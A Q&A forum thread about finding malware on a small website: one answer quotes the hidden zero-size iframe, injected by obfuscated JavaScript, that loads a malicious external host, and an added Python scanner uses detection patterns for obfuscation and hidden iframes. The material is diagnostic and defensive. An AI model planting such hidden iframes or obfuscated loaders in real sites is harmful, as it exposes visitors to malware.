How can I test if a website is infected with malware?

Some friends of mine have a website (www.kennelsoffie.dk) and I'm trying to help them when there is any trouble. However, this time I can't figure it out. When I visit the site using Google Chrome, I'm presented with a warning page claiming that the page that I'm trying to visit contains elements from stopssse.info.

I don't know any PHP, so I simply downloaded the complete website including backups of the database (which are .sql files). Then, I searched all the files for stopssse, but I didn't find anything.

I also tested the site with siteadvisor.com; it says "We tested this site and didn't find any significant problems".

Can PHP hide a reference to the malware site so I can't find it with a simple search? If so, how can you find it?


Solution 1:

I found this in the generated source:

<iframe height="0" width="0" src="http://stopssse.info/l.php?thx" style="display: none; visibility: hidden;">

It was right below the body tag. It's not in the actual page source; it's being added by obfuscated JavaScript.

Edit: if you look at the bottom of http://www.kennelsoffie.dk/includes/jscript.js you'll see a really odd-looking JavaScript function. That's the obfuscated JavaScript function I was telling you about. It starts with

function lIIlOlIllI1000llII10l0OIIIlIOlIOI1O010l0(O00I10I0l00I0IOIO1Ol10O0Ol1Il1lI10OI00Il){var

Best bet is to find and remove it.
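
As an added example (not part of the original answers): a plain search for the domain finds nothing when a script rebuilds the URL at run time, so this Python scanner looks through a downloaded copy of the site for signs of obfuscation instead. The rule names, the 16-character threshold, the file extensions and lines 1 and 3 of the sample are assumptions made for illustration.

```python
import re
from pathlib import Path

# Names made only of look-alike characters (l, I, O, 0, 1), like the function
# name quoted in the answer above. 16+ characters keeps ordinary words out.
CONFUSABLE_ID = re.compile(r"\b[lIO][lIO01]{15,}\b")
# Calls often used to rebuild a hidden string (such as a URL) at run time.
DECODER = re.compile(r"\b(eval|unescape|atob|String\.fromCharCode|document\.write)\s*\(")
# Zero-sized or hidden iframes present in static markup or database dumps.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*(?:(?:height|width)\s*=\s*[\"']?0\b"
    r"|display\s*:\s*none|visibility\s*:\s*hidden)", re.I)

def scan_text(text):
    """Return (line_number, rule, detail) tuples for suspicious lines."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        ids = CONFUSABLE_ID.findall(line)
        if ids:
            findings.append((n, "confusable-identifier", f"{len(ids)} name(s)"))
        calls = sorted(set(DECODER.findall(line)))
        if calls:
            findings.append((n, "runtime-decoder", ",".join(calls)))
        if HIDDEN_IFRAME.search(line):
            findings.append((n, "hidden-iframe", line.strip()[:60]))
    return findings

def scan_tree(root, exts=(".js", ".php", ".html", ".htm", ".sql")):
    """Scan a downloaded copy of the site; returns {path: findings}."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report

# Line 2 is the function header quoted in the answer; lines 1 and 3 are constructed.
SAMPLE_JS = """function showMenu(id){document.getElementById(id).style.display="block";}
function lIIlOlIllI1000llII10l0OIIIlIOlIOI1O010l0(O00I10I0l00I0IOIO1Ol10O0Ol1Il1lI10OI00Il){var
var h = String.fromCharCode(101,120,97,109,112,108,101); document.write(unescape(h));
"""

if __name__ == "__main__":
    # The char codes on line 3 spell "example", yet that word never appears as text.
    print("plain search hit:", "example" in SAMPLE_JS)
    for finding in scan_text(SAMPLE_JS):
        print(finding)
```

Hits are leads for manual review, not verdicts: legitimate minified libraries also call `eval` or `document.write`, so compare flagged files against a known-good copy before removing anything.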

Solution 2:

You are most probably dealing with XSS attacks.

In that case, two steps:

  • Scan the DB, looking for "scripts" tags, and get rid of them.
  • Hire a guy who knows PHP to fix the holes in your data input and set some efficient sanitizing policy.

Solution 3:

The malware might not be on the site, but might be coming from material brought in from external sources, such as advertisements.